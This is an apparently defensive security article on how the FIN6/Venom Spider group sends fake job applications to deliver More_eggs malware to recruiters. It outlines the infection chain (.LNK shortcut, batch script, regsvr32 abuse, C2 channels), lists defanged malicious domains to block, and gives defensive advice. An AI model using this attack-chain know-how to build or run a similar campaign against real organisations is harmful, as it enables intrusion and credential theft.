Hackers Target Recruiters with Fake Job Applications

Hackers use fake job applications to target recruiters. The cybercriminal gang FIN6 is using a clever new method to infiltrate HR professionals: posing as job searchers and tricking recruiters into downloading harmful files. The software, known as More Eggs, is a cybersecurity threat in recruitment. The Increase of Fake Job Application Attacks

The increased use of bogus job applications by fraudsters poses a severe and evolving threat to business recruitment operations. The hacking group FIN6 has been linked to campaigns in which malicious actors mimic job searchers on platforms like LinkedIn and Indeed, circumventing typical email filters and leading recruiters into compromising exchanges (Nair, 2025).

Attackers send non-clickable resume URLs hosted on reputable cloud providers like Amazon Web providers (AWS) to avoid detection. Once manually input, the URLs lead to malware-laden landing sites meant to infect the recruiter's device with backdoors like More_Eggs, which can execute remote commands, steal credentials, and deploy further malware (Maurer, 2025).

How the Attack Works

1. Impersonation and Social Engineering

• Fake LinkedIn Profiles: Hackers create polished, convincing profiles with connections, endorsements, and job history.

• Spoofed Company Domains: They imitate or slightly alter legitimate corporate domains (e.g., using “.co” instead of “.com”) to appear authentic.

• Tailored Messaging: Personalized messages referencing real job openings or company activity to build trust.

  
  

2. Malicious Resume Delivery

• Malware-Embedded Files: Submitted resumes may contain:

  • .LNK files triggering downloads

  • Macro-enabled Word or Excel docs

  • Malicious PDFs or ZIP files

• Cloud-Hosted Payloads: Hosted on AWS, Dropbox, or Google Drive to avoid security filters. Recruiters are often asked to manually enter the URL.

• CAPTCHA Obfuscation: Malware delivery sites may use CAPTCHA walls to evade automated scanning tools (Lyons, 2025).

  
  

3. Credential Harvesting & Business Email Compromise

• Fake Portfolios or Assessment Platforms: Direct recruiters to phishing pages to steal credentials.

• Follow-up Scams: Attackers may impersonate internal staff to extract sensitive information or request wire transfers.

4. Post-Infection Actions

• Data Exfiltration: Harvesting login credentials, applicant PII, HR files, or company IP.

• Remote Access: Use of Remote Access Trojans (RATs) to move laterally in networks.

• Ransomware Deployment: Malware often acts as a precursor to ransomware attacks.

• Brand Impersonation: Compromised company identities may be used to launch further scams.

  
  

Why Recruiters Are Prime Targets

• Access to Sensitive Data: HR departments handle applicant resumes, background checks, and payroll data.

• High Email Volume: Recruiters regularly open files from unfamiliar sources, increasing risk.

• Routine Behavior: Reviewing portfolios and attachments is part of daily operations, making malicious activity harder to detect.

Defensive Measures: How to Protect Your Recruitment Process

Secure Attachments and Email Systems

• Scan all attachments using sandbox tools (e.g., VirusTotal, Sandboxie).

• Disable Office macros by default.

• Use strong email protection (SPF, DKIM, DMARC) and advanced threat protection (ATP).

Verify Identity

• Cross-reference candidates’ email domains, LinkedIn profiles, and resumes.

• Manually type known URLs instead of clicking on emailed links.

• Treat “too perfect” candidates or high-pressure communications with skepticism.

Harden Your Applicant Tracking System (ATS)

• Regularly patch and update ATS software.

• Sanitize file uploads and scan all content server-side.

• Monitor for anomalies like repeated failed logins or strange file formats.

Employee Cybersecurity Training

• Conduct quarterly security awareness programs for recruiters.

• Simulate phishing attempts using fake malicious applications.

• Encourage a “trust but verify” mindset across HR departments.

Use Endpoint and Network Protection

• Deploy Endpoint Detection & Response (EDR) tools (e.g., CrowdStrike, SentinelOne).

• Implement zero trust principles and least privilege access for HR systems.

• Use application whitelisting to prevent unauthorized software execution.

Real-World Examples

• Emotet & QakBot Campaigns (2020–2023): Malware was distributed via fake resumes to HR inboxes.

• QakBot (2023): Specifically targeted recruitment teams with macro-enabled attachments.

• LinkedIn Phishing Schemes: Impersonated recruiters to steal user credentials and launch lateral phishing campaigns.

Technical Breakdown of the More_eggs Attack Chain

Venom Spider’s Pivot: Targeting HR Departments

What Changed:

• Venom Spider (aka TA4557) previously focused on e-commerce. Now it's exploiting HR's universal trust vector—reviewing job applications.

• They distribute fake resumes via legitimate channels (e.g., LinkedIn, Indeed messaging), which adds credibility.

  
  

Why It Works:

• HR teams are accustomed to opening resumes from strangers.

• They often lack the same security training or tools as IT teams, making them vulnerable.

  
  

More_eggs Malware: Technical Breakdown

Attack Flow:

1. Spear-phishing email or job application → links to resume site.

2. CAPTCHA challenge to evade automation → downloads ZIP file.

3. ZIP contains:

   • A decoy image.

   • A malicious .LNK file (Windows shortcut) with embedded obfuscated batch script.

4. Batch script abuses Windows utilities (LOTL) like ie4uinit.exe for covert execution.

5. Downloads obfuscated JavaScript → runs the More_eggs DLL dropper via regsvr32.

6. DLL creates polymorphic JavaScript payloads to avoid sandboxing.

7. Final payload:

   • Uses device-specific encryption (host-locked).

   • Establishes persistent C2 channels (e.g., tool[.]municipiodechepo[.]org).

   • Enables remote access, data exfiltration, and malware delivery.

     
     

Why This Campaign Is Especially Dangerous

• Highly evasive: Uses LOTL tactics, polymorphic code, and time-delayed execution.

• Hard to trace: Uses decentralized hosting (Amazon, GoDaddy).

• Custom per-target: Payloads are encrypted with host-specific keys, complicating reverse engineering.

• Universal entry vector: Every company hires people—HR is now a vulnerable surface.

  
  

How to Defend Against It

Technical Controls

• Secure Email Gateways (SEGs): Filter phishing attempts.

• Endpoint Detection & Response (EDR): Detect abnormal file behavior and lateral movement.

• DNS and URL Filtering: Block known malicious domains and detect anomalous outbound requests.

• File Inspection: Flag .LNK files and other uncommon attachment types sent via job platforms.

Training & Awareness

• HR-specific phishing training: Include examples of job applicant-themed lures.

• Teach red flags: ZIP files, CAPTCHAs on resume sites, unexpected shortcut files.

Behavioral Defense

• Require verification of suspicious files’ metadata (e.g., .LNK pointing to cmd.exe).

• Use sandboxing for attachments before opening, especially in hiring workflows.

Block Threat Infrastructure

• Proactively block:

  • doefstf[.]ryanberardi[.]com

  • tool[.]municipiodechepo[.]org

• Monitor for signs of regsvr32 misuse and suspicious outbound DNS activity.

Conclusion

Fake job applications are a growing trend in cybercrime-as-a-service (CaaS), where social engineering and technical sophistication combine. Organizations should adopt a multi-layered defense approach to reduce risk and protect sensitive HR operations. Security experts advise candidates to verify candidates through independent reference checks and avoid downloading resumes from unknown sources. Amazon, whose AWS infrastructure may have been used, has responded to abuse reports and encourages responsible disclosure.

#Cybersecurity #Recruitment #PhishingAwareness #JobMarketSafety